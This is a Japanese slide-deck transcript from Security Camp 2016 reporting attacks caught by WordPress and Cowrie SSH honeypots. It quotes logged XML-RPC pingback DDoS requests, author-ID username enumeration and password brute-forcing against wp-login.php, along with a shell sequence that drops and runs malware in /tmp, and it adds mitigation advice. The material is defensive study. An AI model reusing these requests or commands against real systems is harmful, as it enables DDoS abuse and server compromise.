ハニーポットで集める攻撃手法-seccamp2016

ハニーポットで集める攻撃手法チューター成果報告 @junk_coken(2015修了生)

自己紹介 •@junk_coken •放送大学3年 •セキュリティ・キャンプ全国大会2015卒 •ハニーポッターになりたい見習い

ハニーポットの環境 • 使用ハニーポット NginxとWordpressによるHTTPハニーポット & CowrieによるSSHハニーポット • 使用機器 Raspberry Pi2
と Raspbian

WordPressへの攻撃

IP - - [日時] "GET /feed/ HTTP/1.1" 200 17309 "-"
"-" "-" "-" IP - - [日時] “POST /xmlrpc.php HTTP/1.0” 499 0 “<?xmlversion=¥x221.0¥x22?><methodCall> <methodName>pingback.ping</methodName><params><param> <value><string>攻撃対象のURL</string></value></param> <param><value><string>記事URL</string></value></param> </params></methodCall>" IP - - [日時] "POST /xmlrpc.php HTTP/1.0" 499 0 "<?xmlversion=¥x221.0¥x22?><methodCall> <methodName>pingback.ping</methodName><params><param> <value><string>攻撃対象のURL</string></value></param> <param><value><string>記事URL</string></value></param> </params></methodCall>"

xmlrpc.phpを狙ったDDoS攻撃 •成功すると1リクエストにつき1回踏み台アクセスできる • WordPressにデフォルトで存在していて、対策しなければ成功される他プラグインで使わないならアクセス制限、またはプラグインで対策

IP - - [日時] "GET //wp-login.php HTTP/1.1" 200 2746 "-"
"-" IP - - [日時] "GET /?author=1 HTTP/1.1" 200 23660 "-" "-“ IP - - [日時] "GET /?author=2 HTTP/1.1" 404 7444 "-" "-" "-" IP - - [日時] "POST //wp-login.php HTTP/1.1" 200 3732 "-" "log=user&pwd=219&wp-submit=Login& redirect_to=http://URL/wp-admin/&testcookie=1¥x0D¥x0A" IP - - [日時] "POST //wp-login.php HTTP/1.1" 200 3732 "-" "log=user&pwd=admin&wp-submit=Login& redirect_to=http://URL/wp-admin/&testcookie=1¥x0D¥x0A" IP - - [日時] "POST //wp-login.php HTTP/1.1" 200 3732 "-" "-" "log=user&pwd=admin123&wp-submit=Login& redirect_to=http://URL/wp-admin/&testcookie=1¥x0D¥x0A"

IDを取得しログインページへの辞書攻撃 • authorというクエリでユーザ名がわかる • ユーザ名は秘匿情報ではないことを改めて思い知る •パスワード設定の大切さもわかる全てのユーザ名を見られたくない場合、アクセス制限推奨

SSHサーバへの攻撃

SSHサーバ型ハニーポットCowrie 期間 •2016年1月15日～7月28日までの約半年間取得ログ数 •アクセス数60,037件 •マルウェア約200種類(ハッシュ値が同一でないもの)

Cowrie -ユーザ名TOP10 Kippo-Graphより

Cowrie -パスワードTOP10 Kippo-Graphより

Cowrie –国別TOP10 CN 49% US 12% RU 7% VN 6%
FR 5% KR 5% IN 5% JP 4% UA 4% NL 3% CN US RU VN FR KR IN JP UA NL

Cowrie -ttylog •ログイン成功されると大体マルウェアを放り込まれる。 • catコマンドでバイナリを直接放り込まれる • たまにwgetでも ~# cat >
/tmp/malware binary… ~# cd /tmp/ /tmp# chmod 777 malware /tmp# ./malware & /tmp# rm malware

おまけ Cowrieを使おう！

Cowrieのどこがいいの？ •SSHハニーポットKippoの改良版 • Kippoのエミュレーション能力の不足を補っている例えば・・・ $ echo -n test ↓
Kippo $ -n test Cowrie $ test $ cat >/tmp/hoge ↓ Kippo exec request failed on channel 0 Cowrie (正常に動作)

Cowrieのどこがいいの？充実しているKippoのアナライザ等をある程度使える •Kippo-Graph http://bruteforce.gr/kippo-graph •Kippo2ElasticSearch & Kibana http://bruteforce.gr/kippo2elasticsearch https://www.elastic.co/products/kibana また、最近Virustotalと連携できるようになった

ご清聴ありがとうございました

ハニーポットで集める攻撃手法-seccamp2016

ハニーポットで集める攻撃手法-seccamp2016

junk_coken

More Decks by junk_coken

Other Decks in Technology

Featured

Transcript

ハニーポットで集める攻撃手法チューター成果報告 @junk_coken(2015修了生)

自己紹介 •@junk_coken •放送大学3年 •セキュリティ・キャンプ全国大会2015卒 •ハニーポッターになりたい見習い

ハニーポットの環境 • 使用ハニーポット NginxとWordpressによるHTTPハニーポット & CowrieによるSSHハニーポット • 使用機器 Raspberry Pi2

WordPressへの攻撃

IP - - [日時] "GET /feed/ HTTP/1.1" 200 17309 "-"

xmlrpc.phpを狙ったDDoS攻撃 •成功すると1リクエストにつき1回踏み台アクセスできる • WordPressにデフォルトで存在していて、対策しなければ成功される他プラグインで使わないならアクセス制限、またはプラグインで対策

IP - - [日時] "GET //wp-login.php HTTP/1.1" 200 2746 "-"

SSHサーバへの攻撃

SSHサーバ型ハニーポットCowrie 期間 •2016年1月15日～7月28日までの約半年間取得ログ数 •アクセス数60,037件 •マルウェア約200種類(ハッシュ値が同一でないもの)

Cowrie -ユーザ名TOP10 Kippo-Graphより

Cowrie -パスワードTOP10 Kippo-Graphより

Cowrie –国別TOP10 CN 49% US 12% RU 7% VN 6%

Cowrie -ttylog •ログイン成功されると大体マルウェアを放り込まれる。 • catコマンドでバイナリを直接放り込まれる • たまにwgetでも ~# cat >

おまけ Cowrieを使おう！

Cowrieのどこがいいの？ •SSHハニーポットKippoの改良版 • Kippoのエミュレーション能力の不足を補っている例えば・・・ $ echo -n test ↓

ご清聴ありがとうございました